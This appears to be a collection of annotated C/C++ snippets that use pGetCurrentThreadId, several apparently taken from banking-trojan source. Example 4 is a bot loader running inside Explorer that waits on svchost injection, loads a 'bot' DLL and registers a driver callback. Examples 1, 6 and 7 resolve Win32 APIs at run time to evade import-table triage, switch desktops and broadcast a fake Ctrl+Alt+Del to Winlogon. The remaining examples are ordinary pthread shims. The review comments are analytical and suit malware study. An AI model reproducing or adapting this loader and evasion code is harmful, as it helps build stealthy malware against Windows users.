Example #1
/*
 * Assigns the desktop `new_desktop` to the calling thread.
 *
 * Returns FALSE when the desktop's name cannot be queried or when
 * SetThreadDesktop fails; otherwise calls CloseDesktop on the handle of the
 * previously assigned desktop and returns TRUE.
 *
 * Analysis note: every Win32 entry point used here is resolved at run time
 * through GetProcAddress(LoadLibrary(...)), so none of them is referenced
 * through the module's import table. Import-based static triage will not
 * list these desktop APIs; the DLL and export names are still present as
 * plain string literals in this listing.
 *
 * NOTE(review): none of the resolved pointers is checked for NULL before use,
 * and each LoadLibrary call takes a module reference that is never released.
 */
BOOL SelectHDESK(HDESK new_desktop)
{
	typedef DWORD
		(WINAPI
		*GetCurrentThreadIdT)(
		VOID
		);
	GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");

	
	typedef HDESK
		(WINAPI
		*GetThreadDesktopT)(
		__in DWORD dwThreadId);
	GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");

	
	typedef BOOL
		(WINAPI
		*GetUserObjectInformationAT)(
		__in HANDLE hObj,
		__in int nIndex,
		__out_bcount_opt(nLength) PVOID pvInfo,
		__in DWORD nLength,
		__out_opt LPDWORD lpnLengthNeeded);
	GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");

	
	typedef BOOL
		(WINAPI
		*SetThreadDesktopT)(
		__in HDESK hDesktop);
	SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");

	
	typedef BOOL
		(WINAPI
		*CloseDesktopT)(
		__in HDESK hDesktop);
	CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");

	// Remember the desktop currently assigned to this thread.
	HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());
	
	DWORD dummy;
	char new_name[256];
	
	// The name and length written here are never read afterwards; the query
	// only serves as a check that the handle can be queried at all.
	if (!pGetUserObjectInformationA(new_desktop, UOI_NAME, &new_name, 256, &dummy)) {
		return FALSE;
	}
	
	// Switch the desktop
	if(!pSetThreadDesktop(new_desktop)) {
		return FALSE;
	}
	
	// Switched successfully - destroy the old desktop
	// NOTE(review): the Win32 documentation says a handle returned by
	// GetThreadDesktop does not need to be closed; confirm this call is intended.
	pCloseDesktop(old_desktop);
	
	return TRUE;
}
Example #2
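/*
 * Block the calling thread until `thread` is no longer on the thread list.
 *
 * thread   - identifier of the thread to wait for.
 * valuePtr - optional out-parameter. This implementation does not record a
 *            thread's exit value, so a non-NULL valuePtr is set to NULL
 *            instead of being left uninitialized for the caller to read.
 *
 * Always returns 0, including when `thread` is not on the thread list.
 */
int pthread_join(pthread_t thread, void** valuePtr)
{
	struct pthread_queue entry;
	struct pthread_queue* head;

	if (valuePtr)
	{
		printf("valuePtr != NULL\n");
		/* No exit value is available here; never hand back stale memory. */
		*valuePtr = NULL;
	}

	/* Check if it is already on the thread list. */
	if (!pCheckThreadList(thread))
		return 0;

	while (1)
	{
		/* Add to the join list. */
		pthread_mutex_lock(&joinMutex);

		head = joinList;

		/* The node lives on this stack frame and is re-initialized on every
		 * pass while joinMutex is held. */
		entry.threadId = pGetCurrentThreadId();
		entry.next = NULL;

		/* NOTE(review): assumes pthread_t is an int-sized integer so that %d
		 * matches; confirm against the pthread_t definition. */
		printf("waiting for %d\n", thread);

		if (!head)
		{
			joinList = &entry;
		}else{
			while (head->next)
				head = head->next;

			head->next = &entry;
		}

		pthread_mutex_unlock(&joinMutex);

		/* NOTE(review): a wake-up issued between the unlock above and this
		 * suspend looks like it could be missed; depends on the semantics of
		 * SysSuspendThread/SysResumeThread, which are not visible here. */
		SysSuspendThread(pGetCurrentThreadId());

		if (!pCheckThreadList(thread))
			break;
	}

	/* Take and release joinMutex before returning. `entry` is a stack object
	 * that may still be linked into a list another thread is walking under
	 * this mutex, so this frame must not be torn down until that holder has
	 * released it. */
	pthread_mutex_lock(&joinMutex);
	pthread_mutex_unlock(&joinMutex);

	return 0;
}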
Example #3
 // Lazily creates the global SendDataHandlers list and records the id of the
 // thread that created it. The list is (re)created when it does not exist yet
 // or when the recorded id differs from the calling thread's id;
 // DestroyDataHandler is installed as the per-item free routine.
 void InitializeHandlersList()
{
	// Initialize the list of interceptors if it has not been created yet
	// or was created in another process.
	// NOTE(review): the comment above speaks of "another process", but the
	// check below compares thread ids (pGetCurrentThreadId), not process ids.
	HANDLE TID = (HANDLE)pGetCurrentThreadId();

	if (SendDataHandlers == NULL || SendHandlersTID != TID)
	{
		// NOTE(review): a previously created list is overwritten here without
		// being freed in this function - confirm whether that is intended.
		SendDataHandlers = List::Create();
		List::SetFreeItemMehod(SendDataHandlers, DestroyDataHandler);
		SendHandlersTID = TID;
	}
}
Example #4
/*
 * Thread entry point; per its own log strings it runs inside the Explorer
 * process. `Data` is interpreted as a PUSER_INIT_NOTIFY block.
 *
 * Flow as written:
 *   1. reject a NULL `Data`;
 *   2. report step "302_ld" and start DbgRptExplorerThread;
 *   3. poll CheckIsInjectToProcess(InitData, SVChostName) every 300 ms until
 *      it returns false;
 *   4. try DoStartBotDll(InitData, 5000) and return if it succeeds;
 *   5. otherwise register StartBotDll through DriverRegisterGlobalCallback
 *      with the current thread id and park this thread forever in alertable
 *      10-second sleeps.
 *
 * Every return path yields 0, so the exit code carries no status.
 *
 * Analysis note: the log tags ("BRDS", "BRDS Explorer") and the step label
 * "302_ld" are string literals in this routine. Whether the LDRDBG strings
 * survive in a given build is not visible here (LDRDBG is defined elsewhere).
 */
DWORD WINAPI ExplorerStartProc(LPVOID Data)
{
	// Log text: "Explorer function started"
	LDRDBG("BRDS", "Зупущена функция Эксплорера  ");

	if (Data == NULL) 
	{
		// Log text: "Invalid data for working in Explorer"
		LDRDBG("BRDS Explorer", "Ошибочные данные для работы в эксплорере ");
		return 0;
	}

	// 302_ld: started in Explorer (the network may be unavailable here)
	DebugReportStepByName("302_ld");

	// Start the thread that, per the original comment, calls back from
	// svchost to the test server
	StartThread(DbgRptExplorerThread, NULL);

	PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data;

	// Log text: "Waiting until the driver stops monitoring the svchost.exe process"
	LDRDBG("BRDS Explorer", "Ожидаем пока драйвер отключит слежение за процессоь svchost.exe ");
	// Busy-poll with a 300 ms sleep; there is no timeout on this wait.
	while (CheckIsInjectToProcess(InitData, SVChostName)) pSleep(300);


	// Log text: "Starting the Explorer thread"
	LDRDBG("BRDS Explorer", "Запуск потока Эксплорера ");

	// First of all, try to start the DLL from a file
	
	if (DoStartBotDll(InitData, 5000))
	{	
		// Log text: "Bot successfully loaded from cache"
		LDRDBG("BRDS Explorer", "Бот успешно загружен из кэша ");
		return 0;
	} 

	// Register the callback event
	// Log text: "Registering the callback method in the Explorer process"
	LDRDBG("BRDS Explorer", "Регистрируем метод обратной связи в процессе Explorer ");
	if (!DriverRegisterGlobalCallback(InitData, (DWORD)pGetCurrentThreadId(), StartBotDll, NULL))
	{
		// Log text: "Failed to register the Explorer callback method"
		LDRDBG("BRDS Explorer", "Ошибка регистрации метода обратной свзи експлорера ");
		return 0;
	}

	// Start the infinite wait loop
	// The second argument TRUE makes each sleep alertable.
	// NOTE(review): presumably the callback registered above is delivered to
	// this thread while it is in the alertable wait - confirm against
	// DriverRegisterGlobalCallback, which is not visible here.

	do
	{
		pSleepEx(10000, TRUE); 
		
	}while(1);

	// Unreachable: the loop above never exits.
	return 0;
}
Example #5
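/*
 * Wait on `cond`, releasing `mutex` while suspended and re-acquiring it
 * before a successful return.
 *
 * Returns EINVAL if the caller does not own `mutex`, 0 once the condition
 * has been signalled, and -1 if SysSuspendThread reports failure. On the -1
 * path `mutex` is NOT re-acquired, as in the original implementation.
 *
 * Changes against the original:
 *   - the tail of cond->list is looked up while cond->mutex is held; the
 *     original sampled cond->list before taking the lock, so a concurrent
 *     list update could leave it appending to a stale node;
 *   - on the failure path the stack-resident queue node is unlinked before
 *     returning, so the shared list never keeps a pointer into a dead frame.
 */
int pthread_cond_wait(pthread_cond_t* cond, pthread_mutex_t* mutex)
{
	struct pthread_queue entry;
	struct pthread_queue* last;
	struct pthread_queue** link;
	int threadId;

	threadId = pGetCurrentThreadId();

	if (mutex->owner != threadId)
		return EINVAL;

	/* A signal is already pending: consume it without queueing.
	 * NOTE(review): cond->signal is read and written here without holding
	 * cond->mutex - confirm that the signalling side tolerates this. */
	if (cond->signal == PTHREAD_COND_SIGNAL)
	{
		cond->signal = PTHREAD_COND_INITIAL;
		return 0;
	}

	entry.threadId=threadId;
	entry.next=NULL;

	pthread_mutex_lock(&cond->mutex);

	/* Read the list head only while the list lock is held. */
	last = cond->list;

	if (!last)
	{
		cond->list=&entry;
	}else{
		while (last->next)
			last=last->next;

		last->next=&entry;
	}

	pthread_mutex_unlock(&cond->mutex);

	pthread_mutex_unlock(mutex);

	while (cond->signal != PTHREAD_COND_SIGNAL)
	{
		if (SysSuspendThread(threadId))
		{
			/* Suspend failed: remove our node (if it is still queued) so the
			 * list does not reference this frame after we return. */
			pthread_mutex_lock(&cond->mutex);

			for (link = &cond->list; *link; link = &(*link)->next)
			{
				if (*link == &entry)
				{
					*link = entry.next;
					break;
				}
			}

			pthread_mutex_unlock(&cond->mutex);

			return -1;
		}
	}

	pthread_mutex_lock(mutex);

	cond->signal = PTHREAD_COND_INITIAL;

	return 0;
}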
Example #6
/*
 * Switches the calling thread to the "Winlogon" desktop, broadcasts a
 * WM_HOTKEY message carrying Ctrl+Alt+Delete to the windows there, then
 * switches back to the desktop the thread was on before.
 *
 * Returns FALSE if SelectDesktop("Winlogon") fails, TRUE otherwise. The
 * results of PostMessageA and of the switch back are not checked, so TRUE
 * does not prove that the message was delivered or that the thread is back
 * on its original desktop.
 *
 * Analysis note: the Win32 entry points are resolved at run time through
 * GetProcAddress(LoadLibrary(...)) and therefore do not show up in the import
 * table. A process that reaches the Winlogon desktop and broadcasts WM_HOTKEY
 * there is behaviour worth flagging when it is not a known remote-control tool.
 * NOTE(review): this hotkey-broadcast approach is understood to apply to
 * legacy Windows releases only - confirm for the targeted OS versions.
 *
 * NOTE(review): the resolved pointers are used without a NULL check.
 */
BOOL SimulateCtrlAltDel()
{
	typedef DWORD
		(WINAPI
		*GetCurrentThreadIdT)(
		VOID
		);
	GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");

	typedef HDESK
		(WINAPI
		*GetThreadDesktopT)(
		__in DWORD dwThreadId);
	GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");
	
	typedef BOOL
		(WINAPI
		*PostMessageAT)(
		__in_opt HWND hWnd,
		__in UINT Msg,
		__in WPARAM wParam,
		__in LPARAM lParam);
	PostMessageAT pPostMessageA=(PostMessageAT)GetProcAddress(LoadLibrary("USER32.dll"),"PostMessageA");

	// Remember the current desktop so it can be restored afterwards.
	HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId());
	
	// Switch into the Winlogon desktop
	if (!SelectDesktop("Winlogon"))
	{
		return FALSE;
	}
	
	// Fake a hotkey event to any windows we find there.... :(
	// Winlogon uses hotkeys to trap Ctrl-Alt-Del...
	pPostMessageA(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE));
	
	// Switch back to our original desktop
	// (the result of SelectHDESK is ignored)
	if (old_desktop != NULL)
		SelectHDESK(old_desktop);
	
	return TRUE;
}
Example #7
/*
 * Compares the name of the desktop assigned to the calling thread with the
 * name of the current input desktop and, when they differ, assigns the input
 * desktop to the thread.
 *
 * Returns true when the names differed (SetThreadDesktop was called, its
 * result unchecked), false when they compared equal.
 *
 * Analysis note: all Win32 entry points, including lstrcmpA, are resolved at
 * run time through GetProcAddress(LoadLibrary(...)), so they are absent from
 * the import table; the export names remain as string literals.
 *
 * NOTE(review): no resolved pointer and no API result is checked. If
 * OpenInputDesktop fails, a NULL handle is passed on to the later calls. If
 * both name queries fail, both buffers stay zero-filled, compare equal, and
 * the function returns false.
 */
bool SwitchInputDesktop()
{
	typedef DWORD
		(WINAPI
		*GetCurrentThreadIdT)(
		VOID
		);
	GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId");

	typedef HDESK
		(WINAPI
		*GetThreadDesktopT)(
		__in DWORD dwThreadId);
	GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop");

	typedef BOOL
		(WINAPI
		*GetUserObjectInformationAT)(
		__in HANDLE hObj,
		__in int nIndex,
		__out_bcount_opt(nLength) PVOID pvInfo,
		__in DWORD nLength,
		__out_opt LPDWORD lpnLengthNeeded);
	GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA");

	typedef BOOL
		(WINAPI
		*SetThreadDesktopT)(
		__in HDESK hDesktop);
	SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop");

	
	typedef HDESK
		(WINAPI
		*OpenInputDesktopT)(
		__in DWORD dwFlags,
		__in BOOL fInherit,
		__in ACCESS_MASK dwDesiredAccess);
	OpenInputDesktopT pOpenInputDesktop=(OpenInputDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"OpenInputDesktop");

	typedef BOOL
		(WINAPI
		*CloseDesktopT)(
		__in HDESK hDesktop);
	CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop");
	
	typedef int
		(WINAPI
		*lstrcmpAT)(
		__in LPCSTR lpString1,
		__in LPCSTR lpString2
		);	
	lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");

	// Declared as BOOL but assigned the C++ literals false/true and returned
	// from a function whose return type is bool.
	BOOL	bRet = false;
	DWORD	dwLengthNeeded;
	
	HDESK	hOldDesktop, hNewDesktop;
	char	strCurrentDesktop[256], strInputDesktop[256];
	
	// Name of the desktop this thread is currently assigned to.
	hOldDesktop = pGetThreadDesktop(pGetCurrentThreadId());
	memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop));
	pGetUserObjectInformationA(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded);
	
	
	// Name of the desktop that currently receives user input, opened with
	// MAXIMUM_ALLOWED access.
	hNewDesktop = pOpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED);
	memset(strInputDesktop, 0, sizeof(strInputDesktop));
	pGetUserObjectInformationA(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded);
	
	// Only switch when the thread is not already on the input desktop.
	if (plstrcmpA(strInputDesktop, strCurrentDesktop) != 0)
	{
		pSetThreadDesktop(hNewDesktop);
		bRet = true;
	}
	// NOTE(review): the Win32 documentation says a handle returned by
	// GetThreadDesktop does not need to be closed.
	pCloseDesktop(hOldDesktop);
	
	// NOTE(review): per the Win32 documentation CloseDesktop fails for a
	// desktop handle that a thread of the calling process is using, which is
	// the case here right after a successful switch - confirm the intent.
	pCloseDesktop(hNewDesktop);
	
	
	return bRet;
}
Example #8
/*
 * First function executed by a newly created thread.
 *
 * `arg` points to a struct pthreadArgs that supplies the start routine, its
 * argument and the condition variable to signal once the thread is
 * registered. The thread links a stack-resident node into threadList, runs
 * the start routine, unlinks itself again, resumes every thread queued on
 * joinList and finally exits through SysExitThread. The start routine's
 * return value is discarded.
 */
static void pthread_start(void* arg)
{
	struct pthreadArgs* startInfo = (struct pthreadArgs*)arg;
	void* (*routine)(void*) = startInfo->startRoutine;
	void* routineArg = startInfo->args;
	struct pthread_queue self;
	struct pthread_queue* node;

	DlTlsCreateContext();

	self.threadId = pGetCurrentThreadId();
	self.next = NULL;

	/* Register: append our node to the tail of the thread list. The list
	 * head is dereferenced unconditionally, so threadList must already hold
	 * at least one node. */
	pthread_mutex_lock(&listMutex);

	for (node = threadList; node->next; node = node->next)
		;

	node->next = &self;

	pthread_mutex_unlock(&listMutex);

	/* Tell the creator that registration is complete. */
	pthread_cond_signal(startInfo->signal);

	routine(routineArg);

	/* Unregister: find the predecessor of our node and splice it out. */
	pthread_mutex_lock(&listMutex);

	for (node = threadList; node->next && node->next != &self; node = node->next)
		;

	if (node->next)
		node->next = node->next->next;

	pthread_mutex_unlock(&listMutex);

	/* Detach the whole join list and resume every waiter on it. The nodes
	 * belong to the waiters' stacks; joinMutex is held for the entire walk. */
	pthread_mutex_lock(&joinMutex);

	node = joinList;
	joinList = NULL;

	for (; node; node = node->next)
		SysResumeThread(node->threadId);

	pthread_mutex_unlock(&joinMutex);

	/* Exit explicitly: returning onto a kernel-provided frame is no longer
	 * possible. */
	SysExitThread(-1);
}
Example #9
/*
 * Return the identifier of the calling thread, taken directly from
 * pGetCurrentThreadId().
 */
pthread_t pthread_self(void)
{
	pthread_t self = pGetCurrentThreadId();

	return self;
}